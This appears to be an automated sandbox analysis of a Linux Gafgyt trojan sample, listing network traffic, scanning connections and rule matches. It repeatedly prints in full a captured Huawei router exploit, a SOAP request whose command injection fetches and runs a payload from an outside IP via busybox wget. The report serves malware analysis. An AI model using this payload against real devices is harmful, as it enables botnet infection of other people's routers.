              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: /tmp/0lMevtsZn2.elf (PID: 5458)Socket: 127.0.0.1:47845Jump to behavior
              Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
              Source: unknownTCP traffic detected without corresponding DNS query: 197.155.132.106
              Source: unknownTCP traffic detected without corresponding DNS query: 41.47.247.3
              Source: unknownTCP traffic detected without corresponding DNS query: 197.233.226.34
              Source: unknownTCP traffic detected without corresponding DNS query: 41.93.173.0
              Source: unknownTCP traffic detected without corresponding DNS query: 197.2.26.174
              Source: unknownTCP traffic detected without corresponding DNS query: 156.45.82.85
              Source: unknownTCP traffic detected without corresponding DNS query: 156.254.245.165
              Source: unknownTCP traffic detected without corresponding DNS query: 156.18.188.89
              Source: unknownTCP traffic detected without corresponding DNS query: 156.198.128.79
              Source: unknownTCP traffic detected without corresponding DNS query: 102.92.29.126
              Source: unknownTCP traffic detected without corresponding DNS query: 197.99.227.158
              Source: unknownTCP traffic detected without corresponding DNS query: 41.146.111.131
              Source: unknownTCP traffic detected without corresponding DNS query: 102.195.219.204
              Source: unknownTCP traffic detected without corresponding DNS query: 41.116.122.186
              Source: unknownTCP traffic detected without corresponding DNS query: 41.85.178.153
              Source: unknownTCP traffic detected without corresponding DNS query: 41.54.115.173
              Source: unknownTCP traffic detected without corresponding DNS query: 156.30.83.61
              Source: unknownTCP traffic detected without corresponding DNS query: 41.29.219.2
              Source: unknownTCP traffic detected without corresponding DNS query: 197.35.180.157
              Source: unknownTCP traffic detected without corresponding DNS query: 156.145.172.111
              Source: unknownTCP traffic detected without corresponding DNS query: 41.88.186.42
              Source: unknownTCP traffic detected without corresponding DNS query: 102.197.37.247
              Source: unknownTCP traffic detected without corresponding DNS query: 102.60.19.103
              Source: unknownTCP traffic detected without corresponding DNS query: 41.21.135.34
              Source: unknownTCP traffic detected without corresponding DNS query: 197.150.205.191
              Source: unknownTCP traffic detected without corresponding DNS query: 102.154.102.15
              Source: unknownTCP traffic detected without corresponding DNS query: 197.89.9.84
              Source: unknownTCP traffic detected without corresponding DNS query: 197.194.128.151
              Source: unknownTCP traffic detected without corresponding DNS query: 156.84.11.220
              Source: unknownTCP traffic detected without corresponding DNS query: 102.85.187.44
              Source: unknownTCP traffic detected without corresponding DNS query: 197.11.48.138
              Source: unknownTCP traffic detected without corresponding DNS query: 197.98.159.64
              Source: unknownTCP traffic detected without corresponding DNS query: 102.239.52.138
              Source: unknownTCP traffic detected without corresponding DNS query: 156.21.59.171
              Source: unknownTCP traffic detected without corresponding DNS query: 156.44.80.225
              Source: unknownTCP traffic detected without corresponding DNS query: 41.29.250.163
              Source: unknownTCP traffic detected without corresponding DNS query: 102.53.112.211
              Source: unknownTCP traffic detected without corresponding DNS query: 102.59.114.51
              Source: unknownTCP traffic detected without corresponding DNS query: 197.20.115.163
              Source: unknownTCP traffic detected without corresponding DNS query: 41.179.103.38
              Source: unknownTCP traffic detected without corresponding DNS query: 102.61.175.57
              Source: unknownTCP traffic detected without corresponding DNS query: 197.58.255.184
              Source: unknownTCP traffic detected without corresponding DNS query: 41.155.92.77
              Source: unknownTCP traffic detected without corresponding DNS query: 102.122.82.146
              Source: unknownTCP traffic detected without corresponding DNS query: 156.78.47.220
              Source: unknownTCP traffic detected without corresponding DNS query: 197.232.1.31
              Source: unknownTCP traffic detected without corresponding DNS query: 156.115.67.183
              Source: unknownTCP traffic detected without corresponding DNS query: 156.178.132.121
              Source: unknownTCP traffic detected without corresponding DNS query: 102.249.240.49
              Source: unknownTCP traffic detected without corresponding DNS query: 41.206.141.43
              Source: global trafficDNS traffic detected: DNS query: cdn.fwupd.org
              Source: global trafficDNS traffic detected: DNS query: motd.ubuntu.com
              Source: global trafficDNS traffic detected: DNS query: retardedclassmate.dyn
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: 0lMevtsZn2.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: 0lMevtsZn2.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443

              System Summary

              barindex
              Source: 0lMevtsZn2.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5458.1.00007f477c400000.00007f477c42a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5464.1.00007f477c400000.00007f477c42a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: 0lMevtsZn2.elf PID: 5458, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: 0lMevtsZn2.elf PID: 5464, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g
              Source: Initial sampleString containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: /bin/busybox telentd
              Source: Initial sampleString containing 'busybox' found: /bin/busybox ntpd
              Source: Initial sampleString containing 'busybox' found: /bin/sh /etc/init.d/rcS[kswapd0][watchdog/0]mini_httpd/bin/busybox telentd/bin/busybox ntpd
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: 0lMevtsZn2.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5458.1.00007f477c400000.00007f477c42a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5464.1.00007f477c400000.00007f477c42a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
